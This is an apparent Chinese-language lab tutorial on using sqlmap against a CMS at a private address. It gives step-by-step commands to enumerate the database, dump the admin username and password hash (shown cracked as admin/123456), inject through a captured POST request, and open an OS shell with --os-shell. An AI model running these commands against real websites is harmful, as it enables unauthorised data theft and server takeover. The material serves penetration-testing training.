SQLmap使用

文章目录

利用sqlmap 注入得到cms网站后台管理员账密

获取数据库名称

在kali中输入sqlmap命令,打开sqlmap,然后输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 --dbs --batch

结果如下:

获取cms数据库的表名

输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 --dbs -D "cms" --tables --batch

结果如下:

得到cms中的所有表名

获取users表中的字段(内容)

输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D "cms" -T "cms_users" --columns --batch

结果如下,users表中有三个字段:

获取username字段和password字段的内容

即获取账号密码,输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D "cms" -T "cms_users" -C "username,password" --dump

在弹出的两次交互信息中输入n,得到账号和md5密码密文:

口算md5密文(其实是用工具解密),得到用户名和密码:

admin

123456

salmap破解psot请求数据包

在后台网页用火狐代理、bp抓包,在http history中查看抓到的数据包,将抓到的post请求包复制

输入下面命令,在tmp目录下新建一个txt文件并用vim编辑器编辑,将post数据包的内容放入txt文件中:

复制代码
touch /tmp/post.txt

vim /tmp/post.txt

命令模式下保存退出

输入下面命令破解post请求包:

复制代码
salmap -r /tmp/post.txt

在交互式命令时回车,是否追踪302输入no:

耐心等待完成,显示了两种注入方法,报错注入和布尔盲注:

爆破密码:

复制代码
sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" -C "username,password" --dump

爆破成功:

salmap获取getshell

在kali控制台输入下面命令:

复制代码
sqlmap -u "http://10.9.75.33/cms/show.php?id=33" --os-shell

选择语言:

选择路径,2是自选路径,选择2:

路径填:

复制代码
c:/phpstudy/www/

获取成功:

相关推荐
梧六柒2 小时前
1.9-为什么要反弹shell-反弹shell的核心价值在哪-注意事项
网络安全
苏生要努力7 小时前
第九届御网杯网络安全大赛初赛WP
linux·python·网络安全
2501_915909067 小时前
iOS App 安全性探索:源码保护、混淆方案与逆向防护日常
websocket·网络协议·tcp/ip·http·网络安全·https·udp
禾木KG11 小时前
网络安全-等级保护(等保) 2-3 GB/T 22240—2020《信息安全技术 网络安全等级保护定级指南》-2020-04-28发布【现行】
网络安全
python算法(魔法师版)11 小时前
API安全
网络·物联网·网络协议·安全·网络安全
it技术分享just_free12 小时前
软考教材重点内容 信息安全工程师 第24章 工控安全需求分析与安全保护工程
web安全·网络安全·信息安全·系统安全·软考
Johny_Zhao12 小时前
Ubuntu安装部署Zabbix网络监控平台和设备配置添加
linux·网络·mysql·网络安全·信息安全·云计算·apache·zabbix·shell·yum源·系统运维·itsm
~西贝贝~16 小时前
二元随机响应(Binary Randomized Response, RR)的翻转概率
网络安全
Bl_a_ck17 小时前
--openssl-legacy-provider is not allowed in NODE_OPTIONS 报错的处理方式
开发语言·前端·web安全·网络安全·前端框架·ssl
2501_915918411 天前
多账号管理与自动化中的浏览器指纹对抗方案
websocket·网络协议·tcp/ip·http·网络安全·https·udp